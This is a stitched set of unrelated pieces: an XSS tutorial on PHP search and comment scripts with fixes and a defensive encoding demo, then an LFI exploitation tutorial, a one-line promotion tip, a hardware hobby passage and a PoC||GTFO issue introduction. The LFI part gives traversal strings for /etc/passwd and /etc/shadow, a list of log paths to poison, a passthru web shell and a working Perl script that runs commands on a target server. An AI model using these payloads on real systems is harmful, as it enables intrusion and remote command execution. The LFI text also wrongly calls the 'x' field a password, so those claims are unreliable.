    I posted this on Byteoverflow a while ago and decided to post it here. I hope to do these for a bunch of different vulnerabilities. In this particular one I will be doing XSS, aka Cross Site Scripting. XSS vulnerabilities are often overlooked and considered useless. This is FAR from the case. XSS vulns are very dangerous and need to be taken seriously, just like SQLi vulns. The possibilities when it comes to XSS vulns are endless. I will be discussing the two types of XSS vulns today, Persistent and Non-Persistent. If you have any questions feel free to ask them here.

    Non Persistent

    Non Persistent XSS vulnerabilities are when user input is not sanitized properly and is used immediately after the request is made. These are generally not as dangerous, but definitely need to be addressed and taken care of. With Non Persistent vulns you would usually have to trick someone into clicking the link with the XSS payload, whereas with Persistent vulns the payload is embedded in a normal page and people can stumble across it even without knowing it; we will talk more about that later. Here is a simple example of a Non-Persistent XSS vulnerability. I will be doing a simple search script that uses GET for this example.

    search.php (deliberately vulnerable):

        <form action="" method="get">
            Search Value: <input type='text' name='squery'>
            <input type='submit' name='search' value='Search'>
        </form>
        <?php
        if (isset($_GET['squery'])) {
            $SEARCH_QUERY = $_GET['squery'];
            // user input echoed straight into the page without sanitizing
            echo "Search results for $SEARCH_QUERY";
            // Continue with search code here
        }
        ?>

    So in this simple code, what's happening is it is taking the user input (the search value), then using it in a GET request to later use in a search query. To the average user this looks like a simple search that there is nothing wrong with. But the user input is not being sanitized properly. The GET request is being used in an echo statement without being sanitized. That means users could input HTML and have it execute. As you can see I was able to input HTML, in this case the font tag, and have it execute. You can see when I submitted the form the font was red. This is a huge problem. This now allows attackers to input JavaScript, which can lead to Java Drive By's, Cookie Stealing, and many other exploits. Again, you can see the JavaScript that is getting executed. In this case it is just a simple alert, but it can be any JavaScript payload an attacker might have. Now, what makes this Non Persistent is that it does not affect any person that goes to the search page. However, if an attacker can get someone to click on a link it can affect them. Now all an attacker would have to do is get the victim to click a link with their malicious payload.

        http://example.com/search.php?squery=<script src='link to payload'></script>&search=Search

    And they could always shorten the link to make it less obvious.

        http://goo.gl/HAKnUV

    Now let's look at where the vulnerability exists in the code and how to fix it.

        $SEARCH_QUERY = $_GET['squery'];
        echo "Search results for $SEARCH_QUERY";

    So in those two lines of code, what is happening is it's getting the user input via the squery GET value. It is then echoing it out to the user. We need to properly sanitize the $SEARCH_QUERY variable before we use it in an echo. We can do this using htmlspecialchars or htmlentities.

        $SEARCH_QUERY = htmlspecialchars($_GET['squery']);
        echo "Search results for $SEARCH_QUERY";

    Or

        $SEARCH_QUERY = htmlentities($_GET['squery']);
        echo "Search results for $SEARCH_QUERY";

    Now you can see that instead of treating the variable as HTML and executing it, it is treating it as a string and completely ignoring the fact that it is HTML.

    Persistent (Stored)

    Persistent or Stored XSS vulnerabilities occur when user input is stored on the server (usually in the DB) and then later displayed on a page without proper sanitation. Persistent XSS vulnerabilities are much more dangerous than Non Persistent. These types of vulnerabilities do not require anyone to click a link or anything. They can be browsing a site just like normal and come across the malicious payload even without knowing. I will be showing you a simple example with a comments script. Here is the simple script we will be using for an example.

        <b><u><font size=6>Title</font></u></b>
        <div id="content">
            sadjasldjasd asdj asdj asdas<br>
            d I<br>
            dsad sadsaldjas<br>
            dasdnasd ankd Kingdom<br>
            sadjalkjd ad asd<br>
            asdlas djas d<br>
            asd Sadki sadj<br>
            asd alsdksa dsadj sadj sad, sad lj<br>
            Sadna sdlasd<br>
        </div>
        <?php
        if (!mysql_connect("localhost", "root", "root")) {
            die('MySQL connection failed');
        }
        // Post comment stuff
        if (isset($_POST['submitcomment'])) {
            // escaped for the SQL query only; this does nothing about HTML in the comment
            $comment = mysql_real_escape_string($_POST['comment']);
            if (mysql_query("INSERT INTO xss.comments (comment) VALUES ('" . $comment . "')")) {
                echo "Comment posted<br>";
            } else {
                echo "Failed to post comment<br>";
            }
        }
        echo "<b><u><font size=4>Comments</font></u></b><br>";
        $get_comments = mysql_query("SELECT * FROM xss.comments");
        if (mysql_num_rows($get_comments) == 0) {
            echo "No comments to display<br>";
        } else {
            while ($c = mysql_fetch_array($get_comments)) {
                $comment = $c['comment'];
                // stored comment echoed as-is: this is the persistent XSS
                echo "$comment<hr>";
            }
        }
        ?>
        <form action="" method="post">
            Submit Comment:<br>
            <textarea rows="4" cols="50" name="comment"></textarea><br>
            <input type='submit' name='submitcomment' value='Post Comment'>
        </form>

    So again, to the normal user this would look just like a normal comment section. In reality the comments are not being sanitized correctly. As you can see the comment I posted is now red. This is very bad; people can now input their own HTML, where it is stored in the DB and displayed to anyone that looks at that article. Now anyone that goes to that article will see the alert box. This is a serious issue. This is obviously not what attackers would do though. They would embed their payload with a legit comment and you would never even know you hit it unless you view the source. Now when someone would view that article they would see nothing fishy, but they would have executed the attacker's payload. If you inspect element on the comment you can see the JavaScript that is getting executed. This is a huge issue and makes many innocent people victims and open for attack even without realizing what happened. Let's take a look at where the vulnerability occurs.

        while ($c = mysql_fetch_array($get_comments)) {
            $comment = $c['comment'];
            echo "$comment<hr>";
        }

    Right there is where the code is fetching the comments from the database and displaying them to the user. The comments are not being sanitized properly before being echo'd out to the users. Again we can use htmlspecialchars or htmlentities to sanitize the comments.

        while ($c = mysql_fetch_array($get_comments)) {
            $comment = htmlspecialchars($c['comment']);
            echo "$comment<hr>";
        }

    Or

        while ($c = mysql_fetch_array($get_comments)) {
            $comment = htmlentities($c['comment']);
            echo "$comment<hr>";
        }

    You can now see that the payload is no longer getting treated as HTML, therefore not getting executed. Keep in mind these are just very simple examples I wrote up for this thread. Next time you are writing or working on a web app please keep these in mind. This is always overlooked, which is probably why they are so common. You can come across these everywhere! I was recently doing work for a client and found about 12 XSS vulnerabilities, 8 or 10 of them being persistent in their dashboard. Which meant someone could have inputted a cookie stealer and waited for them to load the page in the dashboard with the stealer, then logged into their panel for them, which would be bad considering they were storing personal information of customers there. If you would like me to disclose my findings in that project let me know and I will be glad to. Anyway, I hope you understand more about XSS now and how to prevent it. It's a very easy thing to prevent, but at the same time people always forget about it. Anything I missed or if you have anything to add feel free to post it here. Source: madleets
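An added example, not code from the post above or its source: the same htmlspecialchars() fix wrapped in one helper and run offline on constructed payloads, so the difference between the tutorial's bare call and an explicit ENT_QUOTES | ENT_SUBSTITUTE call is visible in a single-quoted attribute and on a comment containing invalid UTF-8. The helper names (html_encode, render_comments), the payload strings and the sample rows are constructed for this demo.

```php
<?php
// Added example, not code from the original post: the htmlspecialchars()
// fix applied through one helper, exercised offline on constructed payloads
// so the difference between the bare call and an explicit-flags call shows.
// Run with: php xss_encoding_demo.php
declare(strict_types=1);

// Encode untrusted text for an HTML text node or a quoted attribute value.
// ENT_QUOTES also escapes the single quote (the bare call relies on PHP's
// default, which escaped only " before PHP 8.1). ENT_SUBSTITUTE turns invalid
// UTF-8 into U+FFFD instead of making the call return "" and silently
// dropping the whole comment.
function html_encode(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

// Output-time encoding for the stored case: rows come back from the database
// exactly as submitted (mysql_real_escape_string protects the INSERT, not the
// page), so every comment is encoded here, at the point it becomes HTML.
function render_comments(array $rows): string
{
    $html = '';
    foreach ($rows as $row) {
        $html .= html_encode($row['comment']) . "<hr>\n";
    }
    return $html === '' ? "No comments to display<br>\n" : $html;
}

// Constructed payloads: the tutorial's script tag, an attribute breakout,
// and a comment carrying a stray invalid byte.
$payloads = [
    'script in text node'    => "<script>alert(1)</script>",
    'single-quote attribute' => "' onmouseover='alert(1)",
    'invalid UTF-8 byte'     => "abc\xff<b>def</b>",
];

foreach ($payloads as $label => $raw) {
    echo "== {$label}\n";
    // search.php style: value lands in a text node
    echo "  text: Search results for " . html_encode($raw) . "\n";
    // a pre-filled, single-quoted input, as search.php's form would have it
    echo "  attr: <input type='text' name='squery' value='" . html_encode($raw) . "'>\n";
    // the tutorial's fix verbatim; on PHP < 8.1 the quote survives and the
    // invalid-UTF-8 comment encodes to an empty string
    echo "  bare: <input type='text' name='squery' value='" . htmlspecialchars($raw) . "'>\n\n";
}

// Constructed rows standing in for "SELECT * FROM xss.comments"
echo render_comments([
    ['comment' => 'Nice article!'],
    ['comment' => "<script src='link to payload'></script>"],
]);
```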
  23. In this tutorial you'll learn how to exploit a vulnerable LFI site. First of all let's have a look at this small PHP code:

    PHP Code:

        <?php
        $page = $_GET['page'];
        include($page);   // the request parameter decides which file is included
        ?>

    This is code that should never be used again, because it is vulnerable to LFI: the $page variable is not sanitized. We take advantage of this vulnerability with this code:

        site.host/index.php?page=../../../../../../../etc/passwd

    If the site is hosted on Unix, user passwords are stored in /etc/passwd and the above code shows the passwords and usernames. Now all you have to do is to decode the password. An encrypted password should look like:

        username:x:503:100:fullname:/home/username:/bin/sh

    In this example, the password is x. As another example of the password:

        username:!:503:100:fullname:/home/username:/bin/sh

    Other "places" where you can find passwords apart from /etc/passwd are:

        /etc/shadow
        /etc/group
        /etc/security/group
        /etc/security/passwd
        /etc/security/user
        /etc/security/environ
        /etc/security/limits

    In case the browser will show a late inclusion .php (and automatically ./etc/passwd.php does not exist), add to sf including server will skip all write.

        site.host/index.php?file=../../../../../../../../etc/passwd

    We try to run commands on the server by injecting PHP code into the logs, then including them. Some log addresses:

        ../apache/logs/error.log
        ../apache/logs/access.log
        ../../apache/logs/error.log
        ../../apache/logs/access.log
        ../../../apache/logs/error.log
        ../../../apache/logs/access.log
        ../../../../../../../etc/httpd/logs/acces_log
        ../../../../../../../etc/httpd/logs/acces.log
        ../../../../../../../etc/httpd/logs/error_log
        ../../../../../../../etc/httpd/logs/error.log
        ../../../../../../../var/www/logs/access_log
        ../../../../../../../var/www/logs/access.log
        ../../../../../../../usr/local/apache/logs/access_log
        ../../../../../../../usr/local/apache/logs/access.log
        ../../../../../../../var/log/apache/access_log
        ../../../../../../../var/log/apache2/access_log
        ../../../../../../../var/log/apache/access.log
        ../../../../../../../var/log/apache2/access.log
        ../../../../../../../var/log/access_log
        ../../../../../../../var/log/access.log
        ../../../../../../../var/www/logs/error_log
        ../../../../../../../var/www/logs/error.log
        ../../../../../../../usr/local/apache/logs/error_log
        ../../../../../../../usr/local/apache/logs/error.log
        ../../../../../../../var/log/apache/error_log
        ../../../../../../../var/log/apache2/error_log
        ../../../../../../../var/log/apache/error.log
        ../../../../../../../var/log/apache2/error.log
        ../../../../../../../var/log/error_log
        ../../../../../../../var/log/error.log

        site.host/index.php?file=../../../../../../../../etc/passwd

    Ok, now let's look at the log that saves pages that do not exist, and the following code: <? passthru(\$_GET[cmd]) ?>. If we write in the browser:

        site.host/<? passthru(\$_GET[cmd]) ?>

    we'll obviously be shown a page that says that this code does not exist on the server, because the browser automatically encodes the URL, and the page that we have reached the browser translates to:

        site.host/<? passthru(\$_GET[cmd]) ?>

    So you have to do something else... We use the following Perl script:

        #!/usr/bin/perl -w
        use IO::Socket;
        use LWP::UserAgent;

        $site = "victim.com";
        $path = "/folder/";
        $code = "<? passthru(\$_GET[cmd]) ?>";
        $log  = "../../../../../../../etc/httpd/logs/error_log";

        print "Trying to inject the code";
        $socket = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$site", PeerPort => "80") or die "\nConnection Failed.\n\n";
        # the code is sent in the request line and the User-Agent header so it ends up in the log
        print $socket "GET " . $path . $code . " HTTP/1.1\r\n";
        print $socket "User-Agent: " . $code . "\r\n";
        print $socket "Host: " . $site . "\r\n";
        print $socket "Connection: close\r\n\r\n";
        close($socket);
        print "\nCode $code successfully injected in $log\n";

        print "\nType command to run or exit to end: ";
        $cmd = <STDIN>;
        while ($cmd !~ "exit") {
            $socket = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$site", PeerPort => "80") or die "\nConnection Failed.\n\n";
            # the vulnerable include() above loads the poisoned log
            print $socket "GET " . $path . "index.php?page=" . $log . "&cmd=$cmd HTTP/1.1\r\n";
            print $socket "Host: " . $site . "\r\n";
            print $socket "Accept: */*\r\n";
            print $socket "Connection: close\r\n\r\n";
            while ($show = <$socket>) {
                print $show;
            }
            print "Type command to run or exit to end: ";
            $cmd = <STDIN>;
        }

    Source: madleets
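An added example, not code from the post above or its source: the include($_GET['page']) pattern from the tutorial next to a hardened resolver that treats the request value as an allowlist key rather than a path, run offline against constructed requests that include the tutorial's own traversal string. PAGE_MAP, resolve_page() and the temporary pages directory are constructed for this demo.

```php
<?php
// Added example, not code from the original post: the include($_GET['page'])
// pattern beside a hardened resolver, exercised offline on constructed
// requests. Run with: php lfi_resolver_demo.php
declare(strict_types=1);

// Vulnerable form from the tutorial, shown for comparison only:
//     $page = $_GET['page'];
//     include($page);        // any readable file, e.g. ../../../../etc/passwd

// Map request keys to files under one directory. Nothing taken from the
// request is ever concatenated into a path.
const PAGE_MAP = ['home' => 'home.php', 'about' => 'about.php'];

// Return the absolute file to include, or null when the request is refused.
// Refusals are logged with the raw value so traversal attempts show up in
// the application log instead of producing a silent blank page.
function resolve_page(string $pagesDir, ?string $requested): ?string
{
    if ($requested === null || !array_key_exists($requested, PAGE_MAP)) {
        error_log('refused page parameter: ' . var_export($requested, true));
        return null;
    }
    $base = realpath($pagesDir);
    $real = realpath($pagesDir . '/' . PAGE_MAP[$requested]);
    // Defence in depth: the resolved file must exist and sit inside $pagesDir
    // (guards against a mis-edited PAGE_MAP or a symlink pointing elsewhere).
    if ($base === false || $real === false
        || strpos($real, $base . DIRECTORY_SEPARATOR) !== 0) {
        error_log('page outside pages dir: ' . var_export($requested, true));
        return null;
    }
    return $real;
}

// --- offline demo: constructed pages directory and constructed requests ---
$pagesDir = sys_get_temp_dir() . '/lfi_demo_pages_' . getmypid();
mkdir($pagesDir, 0700);
foreach (PAGE_MAP as $file) {
    file_put_contents("$pagesDir/$file", "<?php echo 'this is $file';\n");
}

$requests = [
    'home',                                            // allowlisted key
    'about',                                           // allowlisted key
    '../../../../../../../etc/passwd',                 // the tutorial's traversal string
    '../../../../../../../var/log/apache2/access_log', // a log-poisoning target from the list
    'home.php',                                        // real file name, but not a key
    null,                                              // parameter missing
];
foreach ($requests as $req) {
    $resolved = resolve_page($pagesDir, $req);
    printf("%-52s -> %s\n", var_export($req, true),
        $resolved === null ? 'REFUSED (404)' : 'include ' . basename($resolved));
}

// In the web entry point this becomes:
//     $page = resolve_page(__DIR__ . '/pages', $_GET['page'] ?? 'home');
//     if ($page === null) { http_response_code(404); exit('Page not found'); }
//     include $page;

// remove the constructed directory again
foreach (PAGE_MAP as $file) {
    unlink("$pagesDir/$file");
}
rmdir($pagesDir);
```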
  24. Advertise on various sites. Try to get in touch with friends so they promote your page. Talk to other page administrators about advertising each other. Look for people willing to post on the page (Editors).
  25. So, plug everything in, attach an external power supply to the graphics card, power it up, and. . . nothing. Or so it would seem. But, we’ve got a serial console on the Galileo, so we can check it out by running lspci. And there we have it! An Nvidia 0x10de standing out in a sea of Intel 0x8086. Our graphics card is connected, enumerated, and waiting for drivers.

    7.3 Solemnization through Software

    On a normal desktop, the BIOS starts up, runs the video BIOS that initializes the display, and gets on with things. But this is supposed to be a tiny embedded system. While it does boot via EFI, it doesn’t run video BIOS or any option ROMs. We’ll have to do that by hand. There’s already great instructions by Sergey Kiselev on how to build your own Linux for Galileo available.11 I mostly followed those to get a standard install working, but I had to make two changes between steps 7 and 8 of Kiselev’s tutorial. We need to add all the X11 related packages, and we need to enable nouveau, the open-source Nvidia drivers, in our kernel configuration.

        7.1. Add ``x11'' to the DISTRO_FEATURES line in
             meta-clanton_vxxxx/meta-clanton-distro/conf/distro/clanton-tiny.conf
        7.2. Configure the kernel by running ``bitbake linux-yocto-clanton -c menuconfig''
             and enabling nouveau under drivers->graphics->nouveau

    Copy the resulting files to a MicroSD card, pop it in your Galileo, and you are a modprobe nouveau && startx away from what might be the most inefficient way to drive a display ever devised. Of course, there’s no window manager or input devices yet configured, so you can’t do much, but that’s just a software problem, right?
    Read more to PoC || GTFO 0x05

    1 Sacrament of Communion with the Weird Machines

    Neighbors, please join me in reading this seventh release of the International Journal of Proof of Concept or Get the Fuck Out, a friendly little collection of articles for ladies and gentlemen of distinguished ability and taste in the field of software exploitation and the worship of weird machines. If you are missing the first six issues, we the editors suggest pirating them from the usual locations, or on paper from a neighbor who picked up a copy of the first in Vegas, the second in São Paulo, the third in Hamburg, the fourth in Heidelberg, or the fifth in Montréal, or the sixth in Las Vegas. This release is dedicated to Jean Serrière, F8CW, who used his technical knowledge and an illegal shortwave transceiver to fight against the Nazi occupation of France. His wife Alice Serrière once, when asked “Where are the tubes?” showed occupying soldiers the leaky pipes in their basement.

    In Section 2, the Pastor reminds us that there are things that we must be thankful for, with a parable freshly drawn from the Intertubes.

    In Section 3, Fiora shares with us a collection of nifty tricks necessary to emulate modern Nintendo Gamecube and Wii hardware both quickly and correctly. Tricks involve fancy MMU emulation, ways to emulate PowerPC’s bl/blr calling convention without confusing an X86 branch predictor, and subtle bugs that must be accounted for in accurate floating point emulation.

    Continuing the tradition of getting Adobe to blacklist our fine journal, pocorgtfo06.pdf is a TAR polyglot, which contains two valid PoC, as in both Pictures of Cats and Proofs of Concept. In Section 4, Ange Albertini explains how this sleight of hand is performed.

    In Section 5, Micah Elizabeth Scott shares the story of the Pong Easter Egg that hides in VMWare and the Pride Easter Egg that hides inside that!

    In Section 6, Craig Heffner shares two effective tricks for detecting that MIPS code is running inside of an emulator. From kernel mode, he identifies special function registers that have values distinct to Qemu. From user mode, he flushes cache just before overwriting and then executing shellcode. Only on a real machine—with unsynchronized I and D caches—does the older copy of the code execute.

    In Section 7, Philippe Teuwen extends his coloring book scripts from PoC||GTFO 5:3 to exploit the AngeCryption trick that first appeared in PoC||GTFO 3:11.

    In Section 8, Joe Grand presents some tricks for reverse engineering printed circuit boards with sand paper and a flatbed scanner.

    Continuing this issue’s theme of tricks that allow or frustrate debugging and emulation, Ryan O’Neill in Section 9 describes the internals of his Davinci self-extracting executables in Linux. Here you’ll learn how to prevent your process from being easily debugged, sidestepping LD_PRELOAD and ptrace().

    In Section 10, Don A. Bailey treats us to a fine bit of Vuln Fiction, describing a frightening Internet of All Things run by a company not so different from one that shipped a malicious driver last month.

    Finally, in Section 11 we pass around the old collection plate, because—in the immortal words of St. Herbert—the PoC must flow!

    Read more to PoC || GTFO 0x06